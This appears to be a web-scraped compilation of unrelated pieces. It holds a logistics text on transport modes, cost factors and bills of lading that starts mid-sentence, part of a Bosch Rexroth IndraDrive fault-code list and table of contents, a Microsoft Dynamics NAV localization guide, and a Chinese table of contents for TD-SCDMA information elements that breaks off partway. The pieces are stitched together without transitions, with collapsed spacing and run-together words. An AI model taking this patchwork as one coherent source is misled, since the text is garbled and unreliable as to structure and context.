time schedules and service from terminal to terminal.To provide improved service to major rail users, progressive railroads have concentrated on the development of specialized equipment, such as theenclosed tri-level automobile car, cushioned appliance cars, unit trains, articulated cars, and double-stack containers. Unit trains are an entire train carrying a single product. Typically, the product is a buck commodity such as coal or grain. Unit trains have also been used to support assembly operations for the automobile industry. The unit train is faster and less expensive to operate than traditional trains since it can bypass rail-yards and go direct to the product’s destination. Articulated cars have an extended rail chassis that can haul up to ten containers on a single flexible unit.Road TransportationRoad transport is widely used in inland delivery of goods. This mode tends to be used for higher-value and lower-volume cargo over relatively short distance. It is capable of providing a door to door service. It has not any break in the journey to change from one vehicle to another. So it can be flexible enough to perform “just-in-t ime” delivery. Any work place in the country can be serviced by road.The advantages of road transport are flexibility of both location and time and speed of delivery. To a significant degree the rapid growth of the road carrier industry results from door-to-door operating flexibility and speed of inter-city movement. With the development of road transport, new types of problem, such as a significant growth of fuel consumption, air pollution, traffic congestion and road accidents have emerged.In comparison to railroads, road carriers have relatively small fixed investments in terminal facilities and operate on publicly maintained highways. Although the cost of license fees, user fees, and tolls is considerable, these expenses are directly related to the number of over-the-road units and miles operated. The variable cost per mile for motor carriers is high because a separate power unit and drive are required for each trailer or combination of tandem trailers. Labor requirements are also highbecause of driver safety restrictions and the need for substantial dock labor. W aterway TransportationWaterway transportation includes maritime and river transportation. As the oldest mode of transport, waterway has developed considerably over the last decades. Waterway is utilized for large loads of low-value-per-unit goods. The carriers are specialized for internal river, canal transport, and international deep-sea ships.It is the cheapest method of moving goods world wide. The main advantage of shipping industry lies in moving the vast quantities of cargo in one ship. The main disadvantages of water transport are the limited rang of operation and speed of the ship which is very slowly. Unless the original and destination of the movement are adjacent to a waterway, supplemental haul by rail or truck is required. The capability of water to carry large tonnage at low variable cost places this mode of transport in demand when low freight rates are desired and speed of transit is a secondary consideration.Water transport ranks between rail and road carrier in respect to fixed cost. Although water carriers must develop and operate their own terminals, the right-of-way is developed and maintained by the government and results in moderate fixed costs compared to rail and highway.Air TransportationAir transport has been increased tremendously and plays a more important role in global logistics than ever before. Air transport accounts for the smallest proportion of cargo transportation. Its growth rate in recent years is the highest among the modes of transport. It offers rapid and flexible delivery. The major advantage of air freight is the speed of travel. The longer the distance of the flight, the greater the time saving of the customer. Air transport is primarily used for: Emergency transport of the critical items, Speedy transport of high-value, low-weight products, Speedy transport ofperishable items.One prohibitive aspect of air transport is the high cost. However, this can be traded off for high speed, which allows other elements of logistical design, such as warehousing or inventory, to be reduced or eliminated.The fixed cost of air transport is low compared to rail, water, and pipeline. In fact, air transport ranks second only to road with respect to low fixed cost. Airways and airport are generally developed and maintained with public funds.Pipeline TransportationPipelines are a significant part of the United States transportation system. In 1989, they accounted for over 53 percent of all crude and petroleum ton-mile movements.The basic nature of pipeline is unique in comparison to all other modes of transport. Pipelines operate on a twenty-four-hour basis, seven days per week, and are limited only by commodity changeover and maintenance. Unlike other modes, there is no empty “container” or “vehicle” that must be returned. Pipelines have the highest fixed cost and lowest variable cost among transport modes. Pipeline routes are practically unlimited. An obvious disadvantage is that pipelines are not flexible and are limited with respect to commodity that can be transported: only products in the form of gas, liquid, or slurry can be handled. Pipelines are usually used to transit natural gas, petroleum and coal. Natural gas and crude oil account for the majority of pipeline traffic. Considering the world's dependence on energy products, pipelines will probably become even more important in the future .Pipelines offer the shipper an extremely high level of service dependability at a relatively low cost. Pipelines are able to deliver their product on time because of the following factors: (1)The flows of products within the pipeline are monitored and controlled by computer. (2)Losses anddamages due to pipeline leaks or breaks are extremely rare. (3)Climatic conditions have minimal effects on products, moving in pipelines.(4)Pipelines are not labor - intensive;Therefore, strikes or employee absences have little effect on their operations. The cost and dependability advantages pipelines have over other transport modes have stimulated shipper interest in moving other products by pipeline.Transportation ManagementThe economic factors of transportationTransport economics is influenced by seven factors. While not direct components of transport rate tables, each factor is considered when developing rates. The specific factors are distance, volume, density, stowability, handling, liability, and market. In general, the above sequence reflects the relative importance of each factor. The specific characteristics are discussed below.Distance is a major influence on transportation cost since it directly contributes to variable cost, such as labor, fuel, and maintenance.The second factor is load volume. Like many other logistics activities, transportation scale economies exist for most movements. Transportation cost per unit of weight decreases as load volume increase.The third economic factor is product density, which incorporates weight and space considerations. These are important since transportation cost is usually quoted in terms of dollars per unit of weight, such as amount per ton or amount of per hundredweight (cwt). Once a vehicle is full, it is not possible to increase the amount carried even if the product is light. Since actual and fuel expenses are not influenced by weight, high density products allow relatively fixed transport costs to be spread across additional weight. As a result, these products are assessed lower transport costs per unit of weight.The stowability factor refers to product dimensions and how they affect vehicle(railcar, trailer, or container)space utilization. Odd sizes and shapes, as well as excessive weight or length, do not stow well and typically waste space. Items with standard rectangular shapes are much easier to stow than odd-shaped items.Special handling equipment may be required for loading or unloading trucks, railcars, or ships. Therefore, the manner in which products are physically grouped together(e.g., taped, boxed, or palletized)for transport and storage also affects handling cost.Finally, market factors, such as lane volume and balance, influence transportation cost. A transport lane refers to movements between original and destination points. Since transportation vehicles and drivers must return to their original, either they must find a load to bring back(“back-haul”). When deadhead movements occur, labor, fuel, and maintenance costs must be charged against the original “front-haul” move. Thus, the ideal situation is for “balanced”moves where volume is equal in both directions. However, this is rarely the case because of demand imbalances in manufacturing and consumption locations.Transport DocumentationSeveral documents are required to perform each transport movement. The three primary types are bills of lading, freight bills, and shipping manifests.The bill of lading is the basic document utilized in purchasing transport service. It serves as a receipt and documents commodities and quantities shipped. For this reason, accurate description and count are essential. In case of loss, damage, or delay, the bill of lading is the basis for damage claims. The designated individual or buyer on a bill of lading is the only bona fide recipient of goods. A carrier is responsible for proper delivery according toinstructions contained in the document. In effect, title is transferred with completion of delivery.The bill of lading specifies terms and conditions of carrier liability and documents responsibility for all possible causes of loss or damage expect those defined as acts of God. It is important that terms and conditions be clearly understood so that appropriate actions can be taken in the event of substandard performance. Recent ICC rulings permit bills of lading to be computerized and electronically transmitted between shippers and carriers.In addition to the uniform bill of lading, other commonly used types are order-notified, export, and government. It is important to select the correct bill of lading for a specific shipment.An order notified of negotiable bill of lading is a credit instrument. It provides that delivery not be made unless the original bill of lading is surrendered to the carrier. The usual procedure is for the seller to send the order notified bill of lading to a third party, usually a bank or credit institution. Upon customer payment for the product, the credit institution releases the goods. This facilitates international transport where payment for goods is a major consideration.An export bill of lading permits domestic use of export rates, which are sometimes lower than domestic rates. Export rates may reduce total cost if applied to domestic origin or destination line-haul transport.The freight bill represents a carrier’s method of charging for transportation services. It is developed using information contained in the bill of lading. The freight bill may be prepaid or collect. A prepaid bill means that transport cost must be paid prior to performance, whereas a collect shipment shifts payment responsibility to the consignee. Considerable administration is involved in preparing bills of lading and freight bills. There has been considerable effect to automate freight bills and bills of lading through EDItransaction. Some firms now elect to pay their freight bills at the time the bill of lading is created, thereby combining the tow documents. Such arrangements are based on relative financial benefits of reduced paperwork costs. Many attempts are also under way to produce all transport documents simultaneously. This has become more practical with the use of computer.The shipping manifest lists individual stops or consignees when multiple shipments are placed on a single vehicle. Each shipment requires a bill of lading. The manifest lists the stop, bill of lading, weight, and case count for each shipment. The objective of the manifest is to provide a single document that defines the contents of the total load without requiring a review of individual bills of lading. For single-stop shipments, the manifest is the same as the bill of lading.运输一、什么是运输每一个公司都要求货物从一个点移到另一个点。
Indradrive 系列 故障代码
Error MessagesF9001 Error internal function call.F9002 Error internal RTOS function callF9003 WatchdogF9004 Hardware trapF8000 Fatal hardware errorF8010 Autom. commutation: Max. motion range when moving back F8011 Commutation offset could not be determinedF8012 Autom. commutation: Max. motion rangeF8013 Automatic commutation: Current too lowF8014 Automatic commutation: OvercurrentF8015 Automatic commutation: TimeoutF8016 Automatic commutation: Iteration without resultF8017 Automatic commutation: Incorrect commutation adjustment F8018 Device overtemperature shutdownF8022 Enc. 1: Enc. signals incorr. (can be cleared in ph. 2) F8023 Error mechanical link of encoder or motor connectionF8025 Overvoltage in power sectionF8027 Safe torque off while drive enabledF8028 Overcurrent in power sectionF8030 Safe stop 1 while drive enabledF8042 Encoder 2 error: Signal amplitude incorrectF8057 Device overload shutdownF8060 Overcurrent in power sectionF8064 Interruption of motor phaseF8067 Synchronization PWM-Timer wrongF8069 +/-15Volt DC errorF8070 +24Volt DC errorF8076 Error in error angle loopF8078 Speed loop error.F8079 Velocity limit value exceededF8091 Power section defectiveF8100 Error when initializing the parameter handlingF8102 Error when initializing power sectionF8118 Invalid power section/firmware combinationF8120 Invalid control section/firmware combinationF8122 Control section defectiveF8129 Incorrect optional module firmwareF8130 Firmware of option 2 of safety technology defectiveF8133 Error when checking interrupting circuitsF8134 SBS: Fatal errorF8135 SMD: Velocity exceededF8140 Fatal CCD error.F8201 Safety command for basic initialization incorrectF8203 Safety technology configuration parameter invalidF8813 Connection error mains chokeF8830 Power section errorF8838 Overcurrent external braking resistorF7010 Safely-limited increment exceededF7011 Safely-monitored position, exceeded in pos. DirectionF7012 Safely-monitored position, exceeded in neg. DirectionF7013 Safely-limited speed exceededF7020 Safe maximum speed exceededF7021 Safely-limited position exceededF7030 Position window Safe stop 2 exceededF7031 Incorrect direction of motionF7040 Validation error parameterized - effective thresholdF7041 Actual position value validation errorF7042 Validation error of safe operation modeF7043 Error of output stage interlockF7050 Time for stopping process exceeded8.3.15 F7051 Safely-monitored deceleration exceeded (159)8.4 Travel Range Errors (F6xxx) (161)8.4.1 Behavior in the Case of Travel Range Errors (161)8.4.2 F6010 PLC Runtime Error (162)8.4.3 F6024 Maximum braking time exceeded (163)8.4.4 F6028 Position limit value exceeded (overflow) (164)8.4.5 F6029 Positive position limit exceeded (164)8.4.6 F6030 Negative position limit exceeded (165)8.4.7 F6034 Emergency-Stop (166)8.4.8 F6042 Both travel range limit switches activated (167)8.4.9 F6043 Positive travel range limit switch activated (167)8.4.10 F6044 Negative travel range limit switch activated (168)8.4.11 F6140 CCD slave error (emergency halt) (169)8.5 Interface Errors (F4xxx) (169)8.5.1 Behavior in the Case of Interface Errors (169)8.5.2 F4001 Sync telegram failure (170)8.5.3 F4002 RTD telegram failure (171)8.5.4 F4003 Invalid communication phase shutdown (172)8.5.5 F4004 Error during phase progression (172)8.5.6 F4005 Error during phase regression (173)8.5.7 F4006 Phase switching without ready signal (173)8.5.8 F4009 Bus failure (173)8.5.9 F4012 Incorrect I/O length (175)8.5.10 F4016 PLC double real-time channel failure (176)8.5.11 F4017 S-III: Incorrect sequence during phase switch (176)8.5.12 F4034 Emergency-Stop (177)8.5.13 F4140 CCD communication error (178)8.6 Non-Fatal Safety Technology Errors (F3xxx) (178)8.6.1 Behavior in the Case of Non-Fatal Safety Technology Errors (178)8.6.2 F3111 Refer. missing when selecting safety related end pos (179)8.6.3 F3112 Safe reference missing (179)8.6.4 F3115 Brake check time interval exceeded (181)Troubleshooting Guide | Rexroth IndraDrive Electric Drivesand ControlsI Bosch Rexroth AG VII/XXIITable of ContentsPage8.6.5 F3116 Nominal load torque of holding system exceeded (182)8.6.6 F3117 Actual position values validation error (182)8.6.7 F3122 SBS: System error (183)8.6.8 F3123 SBS: Brake check missing (184)8.6.9 F3130 Error when checking input signals (185)8.6.10 F3131 Error when checking acknowledgment signal (185)8.6.11 F3132 Error when checking diagnostic output signal (186)8.6.12 F3133 Error when checking interrupting circuits (187)8.6.13 F3134 Dynamization time interval incorrect (188)8.6.14 F3135 Dynamization pulse width incorrect (189)8.6.15 F3140 Safety parameters validation error (192)8.6.16 F3141 Selection validation error (192)8.6.17 F3142 Activation time of enabling control exceeded (193)8.6.18 F3143 Safety command for clearing errors incorrect (194)8.6.19 F3144 Incorrect safety configuration (195)8.6.20 F3145 Error when unlocking the safety door (196)8.6.21 F3146 System error channel 2 (197)8.6.22 F3147 System error channel 1 (198)8.6.23 F3150 Safety command for system start incorrect (199)8.6.24 F3151 Safety command for system halt incorrect (200)8.6.25 F3152 Incorrect backup of safety technology data (201)8.6.26 F3160 Communication error of safe communication (202)8.7 Non-Fatal Errors (F2xxx) (202)8.7.1 Behavior in the Case of Non-Fatal Errors (202)8.7.2 F2002 Encoder assignment not allowed for synchronization (203)8.7.3 F2003 Motion step skipped (203)8.7.4 F2004 Error in MotionProfile (204)8.7.5 F2005 Cam table invalid (205)8.7.6 F2006 MMC was removed (206)8.7.7 F2007 Switching to non-initialized operation mode (206)8.7.8 F2008 RL The motor type has changed (207)8.7.9 F2009 PL Load parameter default values (208)8.7.10 F2010 Error when initializing digital I/O (-> S-0-0423) (209)8.7.11 F2011 PLC - Error no. 1 (210)8.7.12 F2012 PLC - Error no. 2 (210)8.7.13 F2013 PLC - Error no. 3 (211)8.7.14 F2014 PLC - Error no. 4 (211)8.7.15 F2018 Device overtemperature shutdown (211)8.7.16 F2019 Motor overtemperature shutdown (212)8.7.17 F2021 Motor temperature monitor defective (213)8.7.18 F2022 Device temperature monitor defective (214)8.7.19 F2025 Drive not ready for control (214)8.7.20 F2026 Undervoltage in power section (215)8.7.21 F2027 Excessive oscillation in DC bus (216)8.7.22 F2028 Excessive deviation (216)8.7.23 F2031 Encoder 1 error: Signal amplitude incorrect (217)VIII/XXII Bosch Rexroth AG | Electric Drivesand ControlsRexroth IndraDrive | Troubleshooting GuideTable of ContentsPage8.7.24 F2032 Validation error during commutation fine adjustment (217)8.7.25 F2033 External power supply X10 error (218)8.7.26 F2036 Excessive position feedback difference (219)8.7.27 F2037 Excessive position command difference (220)8.7.28 F2039 Maximum acceleration exceeded (220)8.7.29 F2040 Device overtemperature 2 shutdown (221)8.7.30 F2042 Encoder 2: Encoder signals incorrect (222)8.7.31 F2043 Measuring encoder: Encoder signals incorrect (222)8.7.32 F2044 External power supply X15 error (223)8.7.33 F2048 Low battery voltage (224)8.7.34 F2050 Overflow of target position preset memory (225)8.7.35 F2051 No sequential block in target position preset memory (225)8.7.36 F2053 Incr. encoder emulator: Pulse frequency too high (226)8.7.37 F2054 Incr. encoder emulator: Hardware error (226)8.7.38 F2055 External power supply dig. I/O error (227)8.7.39 F2057 Target position out of travel range (227)8.7.40 F2058 Internal overflow by positioning input (228)8.7.41 F2059 Incorrect command value direction when positioning (229)8.7.42 F2063 Internal overflow master axis generator (230)8.7.43 F2064 Incorrect cmd value direction master axis generator (230)8.7.44 F2067 Synchronization to master communication incorrect (231)8.7.45 F2068 Brake error (231)8.7.46 F2069 Error when releasing the motor holding brake (232)8.7.47 F2074 Actual pos. value 1 outside absolute encoder window (232)8.7.48 F2075 Actual pos. value 2 outside absolute encoder window (233)8.7.49 F2076 Actual pos. value 3 outside absolute encoder window (234)8.7.50 F2077 Current measurement trim wrong (235)8.7.51 F2086 Error supply module (236)8.7.52 F2087 Module group communication error (236)8.7.53 F2100 Incorrect access to command value memory (237)8.7.54 F2101 It was impossible to address MMC (237)8.7.55 F2102 It was impossible to address I2C memory (238)8.7.56 F2103 It was impossible to address EnDat memory (238)8.7.57 F2104 Commutation offset invalid (239)8.7.58 F2105 It was impossible to address Hiperface memory (239)8.7.59 F2110 Error in non-cyclical data communic. of power section (240)8.7.60 F2120 MMC: Defective or missing, replace (240)8.7.61 F2121 MMC: Incorrect data or file, create correctly (241)8.7.62 F2122 MMC: Incorrect IBF file, correct it (241)8.7.63 F2123 Retain data backup impossible (242)8.7.64 F2124 MMC: Saving too slowly, replace (243)8.7.65 F2130 Error comfort control panel (243)8.7.66 F2140 CCD slave error (243)8.7.67 F2150 MLD motion function block error (244)8.7.68 F2174 Loss of motor encoder reference (244)8.7.69 F2175 Loss of optional encoder reference (245)Troubleshooting Guide | Rexroth IndraDrive Electric Drivesand Controls| Bosch Rexroth AG IX/XXIITable of ContentsPage8.7.70 F2176 Loss of measuring encoder reference (246)8.7.71 F2177 Modulo limitation error of motor encoder (246)8.7.72 F2178 Modulo limitation error of optional encoder (247)8.7.73 F2179 Modulo limitation error of measuring encoder (247)8.7.74 F2190 Incorrect Ethernet configuration (248)8.7.75 F2260 Command current limit shutoff (249)8.7.76 F2270 Analog input 1 or 2, wire break (249)8.7.77 F2802 PLL is not synchronized (250)8.7.78 F2814 Undervoltage in mains (250)8.7.79 F2815 Overvoltage in mains (251)8.7.80 F2816 Softstart fault power supply unit (251)8.7.81 F2817 Overvoltage in power section (251)8.7.82 F2818 Phase failure (252)8.7.83 F2819 Mains failure (253)8.7.84 F2820 Braking resistor overload (253)8.7.85 F2821 Error in control of braking resistor (254)8.7.86 F2825 Switch-on threshold braking resistor too low (255)8.7.87 F2833 Ground fault in motor line (255)8.7.88 F2834 Contactor control error (256)8.7.89 F2835 Mains contactor wiring error (256)8.7.90 F2836 DC bus balancing monitor error (257)8.7.91 F2837 Contactor monitoring error (257)8.7.92 F2840 Error supply shutdown (257)8.7.93 F2860 Overcurrent in mains-side power section (258)8.7.94 F2890 Invalid device code (259)8.7.95 F2891 Incorrect interrupt timing (259)8.7.96 F2892 Hardware variant not supported (259)8.8 SERCOS Error Codes / Error Messages of Serial Communication (259)9 Warnings (Exxxx) (263)9.1 Fatal Warnings (E8xxx) (263)9.1.1 Behavior in the Case of Fatal Warnings (263)9.1.2 E8025 Overvoltage in power section (263)9.1.3 E8026 Undervoltage in power section (264)9.1.4 E8027 Safe torque off while drive enabled (265)9.1.5 E8028 Overcurrent in power section (265)9.1.6 E8029 Positive position limit exceeded (266)9.1.7 E8030 Negative position limit exceeded (267)9.1.8 E8034 Emergency-Stop (268)9.1.9 E8040 Torque/force actual value limit active (268)9.1.10 E8041 Current limit active (269)9.1.11 E8042 Both travel range limit switches activated (269)9.1.12 E8043 Positive travel range limit switch activated (270)9.1.13 E8044 Negative travel range limit switch activated (271)9.1.14 E8055 Motor overload, current limit active (271)9.1.15 E8057 Device overload, current limit active (272)X/XXII Bosch Rexroth AG | Electric Drivesand ControlsRexroth IndraDrive | Troubleshooting GuideTable of ContentsPage9.1.16 E8058 Drive system not ready for operation (273)9.1.17 E8260 Torque/force command value limit active (273)9.1.18 E8802 PLL is not synchronized (274)9.1.19 E8814 Undervoltage in mains (275)9.1.20 E8815 Overvoltage in mains (275)9.1.21 E8818 Phase failure (276)9.1.22 E8819 Mains failure (276)9.2 Warnings of Category E4xxx (277)9.2.1 E4001 Double MST failure shutdown (277)9.2.2 E4002 Double MDT failure shutdown (278)9.2.3 E4005 No command value input via master communication (279)9.2.4 E4007 SERCOS III: Consumer connection failed (280)9.2.5 E4008 Invalid addressing command value data container A (280)9.2.6 E4009 Invalid addressing actual value data container A (281)9.2.7 E4010 Slave not scanned or address 0 (281)9.2.8 E4012 Maximum number of CCD slaves exceeded (282)9.2.9 E4013 Incorrect CCD addressing (282)9.2.10 E4014 Incorrect phase switch of CCD slaves (283)9.3 Possible Warnings When Operating Safety Technology (E3xxx) (283)9.3.1 Behavior in Case a Safety Technology Warning Occurs (283)9.3.2 E3100 Error when checking input signals (284)9.3.3 E3101 Error when checking acknowledgment signal (284)9.3.4 E3102 Actual position values validation error (285)9.3.5 E3103 Dynamization failed (285)9.3.6 E3104 Safety parameters validation error (286)9.3.7 E3105 Validation error of safe operation mode (286)9.3.8 E3106 System error safety technology (287)9.3.9 E3107 Safe reference missing (287)9.3.10 E3108 Safely-monitored deceleration exceeded (288)9.3.11 E3110 Time interval of forced dynamization exceeded (289)9.3.12 E3115 Prewarning, end of brake check time interval (289)9.3.13 E3116 Nominal load torque of holding system reached (290)9.4 Non-Fatal Warnings (E2xxx) (290)9.4.1 Behavior in Case a Non-Fatal Warning Occurs (290)9.4.2 E2010 Position control with encoder 2 not possible (291)9.4.3 E2011 PLC - Warning no. 1 (291)9.4.4 E2012 PLC - Warning no. 2 (291)9.4.5 E2013 PLC - Warning no. 3 (292)9.4.6 E2014 PLC - Warning no. 4 (292)9.4.7 E2021 Motor temperature outside of measuring range (292)9.4.8 E2026 Undervoltage in power section (293)9.4.9 E2040 Device overtemperature 2 prewarning (294)9.4.10 E2047 Interpolation velocity = 0 (294)9.4.11 E2048 Interpolation acceleration = 0 (295)9.4.12 E2049 Positioning velocity >= limit value (296)9.4.13 E2050 Device overtemp. Prewarning (297)Troubleshooting Guide | Rexroth IndraDrive Electric Drivesand Controls| Bosch Rexroth AG XI/XXIITable of ContentsPage9.4.14 E2051 Motor overtemp. prewarning (298)9.4.15 E2053 Target position out of travel range (298)9.4.16 E2054 Not homed (300)9.4.17 E2055 Feedrate override S-0-0108 = 0 (300)9.4.18 E2056 Torque limit = 0 (301)9.4.19 E2058 Selected positioning block has not been programmed (302)9.4.20 E2059 Velocity command value limit active (302)9.4.21 E2061 Device overload prewarning (303)9.4.22 E2063 Velocity command value > limit value (304)9.4.23 E2064 Target position out of num. range (304)9.4.24 E2069 Holding brake torque too low (305)9.4.25 E2070 Acceleration limit active (306)9.4.26 E2074 Encoder 1: Encoder signals disturbed (306)9.4.27 E2075 Encoder 2: Encoder signals disturbed (307)9.4.28 E2076 Measuring encoder: Encoder signals disturbed (308)9.4.29 E2077 Absolute encoder monitoring, motor encoder (encoder alarm) (308)9.4.30 E2078 Absolute encoder monitoring, opt. encoder (encoder alarm) (309)9.4.31 E2079 Absolute enc. monitoring, measuring encoder (encoder alarm) (309)9.4.32 E2086 Prewarning supply module overload (310)9.4.33 E2092 Internal synchronization defective (310)9.4.34 E2100 Positioning velocity of master axis generator too high (311)9.4.35 E2101 Acceleration of master axis generator is zero (312)9.4.36 E2140 CCD error at node (312)9.4.37 E2270 Analog input 1 or 2, wire break (312)9.4.38 E2802 HW control of braking resistor (313)9.4.39 E2810 Drive system not ready for operation (314)9.4.40 E2814 Undervoltage in mains (314)9.4.41 E2816 Undervoltage in power section (314)9.4.42 E2818 Phase failure (315)9.4.43 E2819 Mains failure (315)9.4.44 E2820 Braking resistor overload prewarning (316)9.4.45 E2829 Not ready for power on (316)。
Microsoft Dynamics NAV 国际化与本地化指南说明书
Product Availability, Localization & Translation Guide for Microsoft Dynamics NAV*) Use of the word country is for convenience only and is not intended to imply sovereignty for any disputed territory that may be mentioned hereinKey Benefits:Country LocalizationsLocalization is the process of adapting software to meet country-specific laws or regulations.Microsoft localizes Microsoft Dynamics NAV to include features and functionality designed to address specific tax, counting or financial reporting requirements for various countries. Features or functionalities that are available in a particular country may not be available in all countries.Please consult your channel partner for details about product features and capabilities. Also consult them and/or your professional advisers to determine whether this software is appropriate for your business needs in a given country.LanguagesTranslation is the process of adapting software or documentation to meet language requirements for a particular country. For a given language, Microsoft may translate some, all or none of the user interface (UI) and documentation for Microsoft Dynamics NAV . Contact your channel partner or the local Microsoft office for more information.Microsoft Dynamics NAV is localized, translated and supported by Microsoft and made generally available in the countries *) andlanguages listed below. To learn more about supported versions of Microsoft Dynamics NAV localized and/or translated by Microsoft, please refer to the product availability table below. In addition to country-specific localizations and/or translations that Microsoft creates, our channel partners may make partner created localizations and/or translations of Microsoft Dynamics NAV available incountries where Microsoft does not provide a localized or translated version. See the Microsoft Dynamics Localization and Translation Overview below for more information on partner-created solutions.1) Details regarding availability of Microsoft Dynamics NAV 2013 will be provided in a future update of this guideMicrosoft Dynamics Localization and Translation OverviewOrganizations doing business in a particular country must comply with country-specific laws, regulations and common business practices to handle their daily business transactions and operations and meet their legal obligations for activities conducted in the country. Microsoft recognizes that non-adherence to these laws and regulations can lead to severe consequences for an organization doing business in that country. As an enterprise resource planning (ERP) solution, Microsoft Dynamics NAV software helps organizations manage their various business processes through its extensible architecture. Microsoft extends the business process functionalityof its Microsoft Dynamics NAV software by developing specific commercial requirements, language, and non-vertical, nationalor international functionality to address specific tax, accountingor financial reporting requirements for countries where Microsoft makes this software generally available. The process of adapting software to meet local laws or requirements is called localization. The process of adapting software to meet language requirements is called translation. Since laws and regulations that affect businesses vary in each country, Microsoft Dynamics NAV software is not supported in terms of localizations, translations, or technical support in all countries. While Microsoft Dynamics NAV software “out-of-the-box” is localized and/or translated to address specific laws and/ or regulations for particular countries, it is not supported in termsof localizations, translations, or technical support in all countries. Features or functionalities that are available in a particular country may not be available in all countries. Rather, we look to our channel partners, who are an important part of our global strategy, to deliver Microsoft Dynamics NAV solutions that help customers meet their compliance obligations. Channel partners may adapt the Microsoft Dynamics NAV software to: • Supplement the base Microsoft Dynamics NAV application by developing functionality to meet specific laws or regulations that are not covered by features provided ”out-of-the-box” (e.g., regulations that are unique to states, provinces, cities, or municipalities in a particular country); or • Create their own localizations and/or translations in countries where Microsoft does not offer a localized and/or translated version of Microsoft Dynamics NAV software. Partner-created solutions are owned, implemented, maintained, and serviced by, or on behalf of, the originating channel partner.Channel Partner-Created Solutions:For additional information about partner-created solutions inyour country, please contact your Microsoft channel partner or local Microsoft office, or utilize the Microsoft Dynamics Marketplace (http://dynamicserp.pinpoint. ) to identify channel partner solutions that might be available in your country.Notice and DisclaimerThis content is provided for information purposes only and is subject to change without notice. It is provided “as is” and is not warranted to be error-free. This information is not intended to constitute tax, accounting, legal or other professional advice or to be used as a substitute for specific advice from your channel partner or a licensed professional. You should not act (or refrain from acting) based on information in this document without obtaining professional advice about your particular facts and circumstances. Microsoft does not make any representation, warranty (express, implied or otherwise) or assurance about the performance or suitability of any localized and/ or translated version of Microsoft Dynamics NAV used outside the country in which Microsoft makes that software generally available, including implied warranties and conditions of merchantability or fitness for a particular purpose. Although Microsoft may refer to its channel partners as “partners”, they are independent entities. There is no partnership, joint venture, agency or franchise relationship or fiduciary duty between Microsoft and its channel partners. Channel partners are solely responsible for any configurations, customizations, localizations and/or translations they create or implement on behalf of customers, including any support or other service they provide to customers for such solutions. Microsoft does not warrant or guarantee partner-created solutions and disclaims any and all liability arising out of any partner-created solution and/or service.。
TD信息元素详解
信息元素功能性定义作者:李欣目录目录 (1)信息元素功能性定义 (11)1 核心网信息元素 (11)1.1 CN Information elements (11)1.2 CN Domain System Information (11)1.3 CN Information info (11)1.4 IMEI (11)1.5 IMSI (GSM-MAP) (11)1.6 Intra Domain NAS Node Selector (11)1.7 Location Area Identification (12)1.8 NAS message (12)1.9 NAS system information (GSM-MAP) (12)1.10 Paging record type identifier (12)1.11 PLMN identity (12)1.12 PLMN Type (12)1.13 P-TMSI (GSM-MAP) (12)1.14 RAB identity (12)1.15 Routing Area Code (12)1.16 Routing Area Identification (13)1.17 TMSI (GSM-MAP) (13)2 UTRAN 移动信息元素 (13)2.1 Cell Access Restriction (13)2.2 Cell identity (13)2.3 Cell selection and re-selection info for SIB3/4 (13)2.4 Cell selection and re-selection info for SIB11/12 (13)2.5 Mapping Info (14)2.6 URA identity (14)3 UE 信息元素 (14)3.1 Activation time (14)3.2 Capability Update Requirement (14)3.3 Cell update cause (15)3.4 Ciphering Algorithm (15)3.5 Ciphering mode info (15)3.6 CN domain specific DRX cycle length coefficient (15)3.7 CPCH Parameters (15)3.8 C-RNTI (15)3.9 DRAC system information (15)3.10 Void (16)3.11 Establishment cause (16)3.12 Expiration Time Factor (16)3.13 Failure cause (16)3.14 Failure cause and error information (16)3.15 Initial UE identity (16)3.16 Integrity check info (16)3.17 Integrity protection activation info (17)3.18 Integrity protection Algorithm (17)3.19 Integrity protection mode info (17)3.20 Maximum bit rate (17)3.21 Measurement capability (17)3.22 Paging cause (17)3.23 Paging record (17)3.24 PDCP capability (17)3.25 Physical channel capability (18)3.26 Protocol error cause (18)3.27 Protocol error indicator (18)3.28 RB timer indicator (18)3.29 Redirection info (18)3.30 Re-establishment timer (18)3.31 Rejection cause (18)3.32 Release cause (18)3.33 RF capability FDD (19)3.34 RLC capability (19)3.35 RLC re-establish indicator (19)3.36 RRC transaction identifier (19)3.37 Security capability (19)3.38 START (19)3.39 Transmission probability (19)3.40 Transport channel capability (20)3.41 UE multi-mode/multi-RAT capability (20)3.42 UE radio access capability (20)3.43 UE Timers and Constants in connected mode (21)3.44 UE Timers and Constants in idle mode (21)3.45 UE positioning capability (21)3.46 URA update cause (21)3.47 U-RNTI (21)3.48 U-RNTI Short (21)3.49 UTRAN DRX cycle length coefficient (21)3.50 Wait time (21)3.51 UE Specific Behavior Information 1 idle (21)3.52 UE Specific Behavior Information 1 interRAT (22)4 无线承载信息元素 (22)4.0 Default configuration identity (22)4.1 Downlink RLC STATUS info (22)4.2 PDCP info (22)4.3 PDCP SN info (22)4.4 Polling info (22)4.5 Predefined configuration identity (23)4.6 Predefined configuration value tag (23)4.7 Predefined RB configuration (23)4.8 RAB info (23)4.9 RAB info Post (23)4.10 RAB information for setup (23)4.11 RAB information to reconfigure (24)4.12 NAS Synchronization indicator (24)4.13 RB activation time info (24)4.14 RB COUNT-C MSB information (24)4.15 RB COUNT-C information (24)4.16 RB identity (24)4.17 RB information to be affected (24)4.18 RB information to reconfigure (25)4.19 RB information to release (25)4.20 RB information to setup (25)4.21 RB mapping info (25)4.22 RB with PDCP information (25)4.23 RLC info (25)4.24 Signaling RB information to setup (26)4.25 Transmission RLC Discard (26)5 传输信道信息元素 (26)5.1 Added or Reconfigured DL TrCH information (26)5.2 Added or Reconfigured UL TrCH information (27)5.3 CPCH set ID (27)5.4 Deleted DL TrCH information (27)5.5 Deleted UL TrCH information (27)5.6 DL Transport channel information common for all transport channels (27)5.7 DRAC Static Information (27)5.8 Power Offset Information (28)5.9 Predefined TrCH configuration (28)5.10 Quality Target (28)5.11 Semi-static Transport Format Information (28)5.12 TFCI Field 2 Information (28)5.13 TFCS Explicit Configuration (28)5.14 TFCS Information for DSCH (TFCI range method) (29)5.15 TFCS Reconfiguration/Addition Information (29)5.16 TFCS Removal Information (29)5.17 Void (29)5.18 Transport channel identity (29)5.19 Transport Format Combination (TFC) (29)5.20 Transport Format Combination Set (29)5.21 Transport Format Combination Set Identity (29)5.22 Transport Format Combination Subset (29)5.23 Transport Format Set (29)5.24 UL Transport channel information common for all transport channels (30)6 物理信道信息元素 (30)6.1 AC-to-ASC mapping (30)6.2 AICH Info (30)6.3 AICH Power offset (30)6.4 Allocation period info (30)6.5 Alpha (30)6.6 ASC Setting (30)6.7 Void (31)6.8 CCTrCH power control info 